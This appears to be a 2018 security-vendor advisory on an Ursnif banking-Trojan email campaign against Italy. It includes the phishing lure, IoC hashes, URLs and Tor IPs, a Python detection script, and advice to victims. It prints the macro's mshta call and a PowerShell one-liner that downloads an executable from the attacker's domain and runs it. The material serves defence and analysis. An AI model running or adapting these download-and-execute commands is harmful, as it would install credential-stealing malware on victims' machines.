09/03/2018
11:45

Warning: Malspam campaign spreading Ursnif malware dated March 9, 2018


The attack on Italy by the Ursnif banking Trojan continues, with the peak of emails sent on March 9, 2018
TG Soft's C.R.A.M. (Anti-Malware Research Center) examined an email campaign spreading the Ursnif malware, sent on March 9, 2018.

Cyber-criminals use social engineering in these fraudulent mass mailings to induce the victim to open infected attachments or click on links in the body of the message.

If you received a suspicious email, send it to C.R.A.M. (Anti-Malware Research Center): see How to send suspicious emails below.


"Ursnif" malware campaign

Malware family: Ursnif
VirIT: Trojan.Win32.Ursnif.EN, Trojan.DOC.Dropper.ON, Trojan.DOC.Dropper.OM

Description:
The mail campaign started this morning, March 9, 2018.

Subject: [changes according to the email received]

Buongiorno,

Vedi allegato e di confermare.

(Good morning,

See attached and to confirm.)

How it spreads:
It exploits the e-mail accounts configured on the infected PC, sending fake infected replies to messages ALREADY RECEIVED by the victim.
The body of the message is always the same (shown above), while the subject differs because the message is a reply to one the victim already received, and therefore varies accordingly.
The malicious attachment in the email is a DOC file containing an AutoClose macro that, as soon as it runs, downloads the malware and executes it.

The AutoClose macro first launches MSHTA.EXE, passing it as a parameter the URL from which a PowerShell script is downloaded:
 
C:\Windows\System32\mshta.exe http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerd

A script is then downloaded and executed by PowerShell:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile('http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class', $env:APPDATA + '\\f0b41f3.exe'); Start-Process $env:APPDATA'\\f0b41f3.exe'; (New-Object System.Net.WebClient).DownloadString('http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerd'); 

The PowerShell script downloads the Ursnif executable from http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class, saves it as f0b41f3.exe under %APPDATA% and starts it.

Concerning the DOC files analyzed, the malware is downloaded from the following sites:
  • http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerd
  • http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class
  • http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerd

After starting, the malware creates a value in HKCU\Software\Microsoft\Windows\CurrentVersion\Run with [random value] = %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[RANDOM FOLDER]\FILENAME.EXE
The Ursnif malware then injects itself into the EXPLORER.EXE process.
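For defenders, the chain described above (Word opening a DOC, the macro launching mshta.exe with a URL, mshta.exe starting PowerShell with -Exec Bypass and a WebClient download, then a Run value pointing into %APPDATA%\Roaming\Microsoft\[random folder]) maps directly onto process-creation and registry telemetry. The following Python is an added example written for this page, not code from TG Soft or the original advisory: the events are constructed sample inputs shaped like Sysmon process-creation records and mirror the command lines documented above, the URL list is taken from the advisory's IoC section after refanging, and the rule names and the Run-value heuristic are assumptions of this example.

```python
import re

# Constructed Sysmon-style process-creation events (parent image, image,
# command line). Sample input written for this example, not telemetry from
# the original advisory; the first two mirror the chain it documents, the
# last two are benign-looking controls so the rules can be seen not firing.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"C:\Windows\System32\mshta.exe http://auwhguahsdusahdsd.com/REX/slick.php?utma=itnerd"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r"powershell.exe -Exec Bypass -NoExit -Command "
                 r"(New-Object System.Net.WebClient).DownloadFile('http://auwhguahsdusahdsd.com/NOC/itnerd.class', "
                 r"$env:APPDATA + '\\f0b41f3.exe'); Start-Process $env:APPDATA'\\f0b41f3.exe'")},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\alice\Desktop\report.hta"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Process"},
]

# Defanged URLs copied from the advisory's IoC list.
DEFANGED_URLS = [
    "http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerd",
    "http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class",
    "http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerd",
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
PS_BYPASS_RE = re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.IGNORECASE)
PS_DOWNLOAD_RE = re.compile(r"\.(?:downloadfile|downloadstring)\s*\(", re.IGNORECASE)
# Heuristic (an assumption of this example): an .exe directly under a
# subfolder of AppData\Roaming\Microsoft is the persistence path the
# advisory describes and is unusual for legitimate Run entries.
RUN_VALUE_RE = re.compile(r"appdata\\roaming\\microsoft\\[^\\]+\\[^\\]+\.exe$", re.IGNORECASE)


def refang(ioc: str) -> str:
    """Convert a defanged indicator (x[.]y, hxxp://) back to its matchable form."""
    return ioc.replace("[.]", ".").replace("hxxp://", "http://")


KNOWN_BAD_URLS = {refang(u) for u in DEFANGED_URLS}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event: dict) -> list:
    """Return the names of the rules an event triggers (empty list = nothing seen)."""
    hits = []
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    # Rule 1: an Office application launching mshta.exe with a URL argument.
    if parent in OFFICE_APPS and image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("office_spawns_mshta_with_url")
    # Rule 2: PowerShell with execution-policy bypass plus a WebClient download.
    if image == "powershell.exe" and PS_BYPASS_RE.search(cmd) and PS_DOWNLOAD_RE.search(cmd):
        hits.append("powershell_bypass_webclient_download")
    # Rule 3: exact match against the advisory's URL indicators.
    if any(url in KNOWN_BAD_URLS for url in URL_RE.findall(cmd)):
        hits.append("known_bad_url")
    return hits


def suspicious_run_value(data: str) -> bool:
    """True if a Run value's data points into AppData\\Roaming\\Microsoft\\<folder>\\<file>.exe."""
    return bool(RUN_VALUE_RE.search(data))


def scan(events: list) -> list:
    """Run every rule over a list of events; return (index, rule names) for each hit."""
    findings = []
    for idx, event in enumerate(events):
        hits = classify_event(event)
        if hits:
            findings.append((idx, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Rules 1 and 2 are behavioural and keep firing when the campaign rotates its domain or file names; rule 3 and the Run-value heuristic are the indicator-based checks and should be treated as such (the Run-value regex in particular is a heuristic and can produce false positives on software that installs per-user under that folder).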

Examples:
Name: ACLU8THK.EXE
MD5: 3DE11A393F9376C928B2D8CEA7EE4744
Size: 394,752 bytes
Compile date: 09/03/2018 03:26:42

Name: APPIASDS.EXE
MD5: EE1B1D695CE9DD10E34E4859AA2D8E87
Size: 445,712 bytes
Compile date: 09/03/2018 08:10:25
 

Note:
The downloaded malware belongs to the Ursnif family; its distinguishing feature is stealing login credentials for sensitive sites such as home banking, mail, FTP, etc.

IOC:

File DOC MD5:
009E418C23008DBFA822CC77834F21EA
0DE8916665C11B76516336A705444F09
1CC733CEA05F83552A7B0F297D5C88F6
24F007E217C5F37124588A17E1C341E8
30FD4C64074BB30E2A50038A92EFAA6C
444FAD5850FA6ACD780C89DA4EA0ACE8
4A0790CD1D27ACE1E6481398ECE32F8C
4B975321733C73F70A65F1FD489D10CF
4C9E026FB64E7D63DC21F98D380CA0D7
6FAE6B27BC91BEDEF51D5046720D0F1C
75634D68D9F162380ABC0AF8BAD20DA7
7EAA57DCC1FA83662C0F2E26ED52BEF8
7F87732379661DBB19A93F3EB1A354D1
871BB91657BCB31A909B3B7DB17727B8
9EE85BA5FDFA6E88EC30BA2733A5F4FA
A2DC123791E75121FE03A60497AD03FB
A4236F32C28BA2F72D2FE0A8B8F9829C
A5D58B583E42C8AD5E07FD48559421DC
AE2E24AB2ED8BAC1CC6326B16F56B4E4
BC2D30BAC1584B539EE6C9BD0B2759D8
CEB5B8FF653221F5000F489844F9E149
D00743082B6167BB1493B1589D9F00BB
DB796A8719C4A037134CD5C78B51BDCF
E1EC19D2B150EB4897AEBC73A6096639
FA791AE1467A9939B643388F1A9536B1
FD1C8219BD982577418394F14844A5D1

File EXE MD5:
3DE11A393F9376C928B2D8CEA7EE4744
BA732A11F27DA190EF0AC40E6F7CC151
EE1B1D695CE9DD10E34E4859AA2D8E87


URL:
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnere
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerd
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerc
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerb
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnera
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itner
http://auwhguahsdusahdsd[.]com/NOC/itnere[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnerc[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnerb[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnera[.]class
http://auwhguahsdusahdsd[.]com/NOC/itner[.]class
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnere
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerd
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerc
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnera
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itner

SMTP servers contacted:
smtp.rambler.ru (ip: 81.19.77.165)

Tor IPs contacted:
138.197.168.63:443
142.44.210.91:9001
146.185.189.197:443
158.69.119.35:9001
159.203.178.178:443
161.97.195.50:443
162.209.96.48:443
163.172.175.174:9001
163.172.216.195:9001
167.114.113.134:9001
176.31.101.92:9938
176.9.133.154:110
176.9.54.142:9001
178.159.0.38:443
178.16.208.56:443
178.16.208.59:443
178.32.189.88:443
178.32.61.9:9001
178.62.43.5:443
178.79.161.177:9001
18.82.3.136:9001
185.106.122.188:443
185.129.249.124:9001
185.22.174.46:9001
185.86.151.231:9001
188.241.58.216:443
192.52.167.71:443
192.99.13.48:9001
193.11.114.45:9002
194.63.142.11:443
195.154.250.239:443
195.181.216.59:443
195.201.20.82:21
195.62.53.196:16465
212.32.230.216:810
212.51.134.123:9001
213.152.168.27:443
217.182.198.76:9001
217.197.91.145:443
217.79.178.60:443
37.200.99.251:9001
46.101.104.245:9001
46.101.183.160:443
46.20.35.114:443
5.135.234.164:9001
5.39.33.178:9001
5.9.121.207:443
50.7.151.47:443
51.15.92.182:443
51.175.193.142:443
54.36.120.156:443
54.88.165.229:80
62.210.123.24:443
62.210.204.55:9031
77.87.49.6:8080
77.87.49.6:9002
78.142.19.11:443
78.46.217.214:443
85.204.74.139:443
85.25.43.31:443
86.110.117.166:7588
86.59.21.38:443
87.122.34.72:9001
87.73.84.77:443
91.121.23.100:8001
91.121.23.100:9001
91.233.116.51:443
93.115.91.66:443
93.180.157.154:9001
94.130.183.13:443
95.130.9.210:443
95.130.9.76:9001
95.141.83.146:443
95.183.52.172:443


 


 


How to identify a fake email

Experience and common sense are the first weapons against these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of ZIP-formatted attachments and, if possible, DO NOT enable automatic macro execution. Enabling automatic macro execution is strongly discouraged, since simply opening a Word or Excel file would then run its macros immediately without any prior alert.
If you have been infected by a banker, TG Soft's C.R.A.M. advises taking appropriate security precautions even after the remediation of the system(s) involved, such as changing the passwords you use most often on the Web. If the workstation involved is used for home-banking transactions, a check with your bank is also recommended.

How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts

Sending material to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, can be done safely in two ways:
  1. Any suspect email can be sent directly from the recipient's e-mail client to lite@virit.com, choosing "Forward as Attachment" as the sending mode and putting "Possible phishing page to verify" or "Possible Malware to verify" in the subject, as appropriate;
  2. Save the e-mail to be sent to TG Soft's C.R.A.M. for analysis as a file outside the e-mail program used. The resulting file must then be sent by uploading it from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). If you want feedback on the analysis of the data submitted, you must indicate an e-mail address and a brief description of the reason for the submission (for example: possible/probable phishing; possible/probable malware; or other).
We give you these suggestions to help avoid credential theft, viruses/malware or, even worse, next-generation Ransomware / Crypto-Malware.
 

Integrate your PC / SERVER protection with Vir.IT eXplorer Lite

If you are not yet using Vir.IT eXplorer PRO, it is advisable to install Vir.IT eXplorer Lite -FREE Edition- to supplement the antivirus in use and increase the security of your computers, PCs and servers alike.

Vir.IT eXplorer Lite has the following special features:
  • freely usable in both private and corporate environments, with Engine+Signature updates without time limitation;
  • interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and servers. We recommend using it as a supplement to the AntiVirus already in use, as it does not conflict with or slow down the system but significantly increases security in terms of identification and remediation of infected files;
  • it identifies and, in many cases, also removes most of the viruses/malware currently circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.IT eXplorer PRO;
  • through the Intrusion Detection technology, also available in the Lite version of Vir.IT eXplorer, the software is able to report new-generation viruses/malware that have installed themselves automatically and send the reported files to TG Soft's C.R.A.M.;
  • proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.

For Vir.IT eXplorer PRO users...

Vir.IT eXplorer PRO owners can also contact TG Soft's technical phone support free of charge. The details can be found on the CLIENTS support page.
 


C.R.A.M.

TG Soft's Anti-Malware Research Center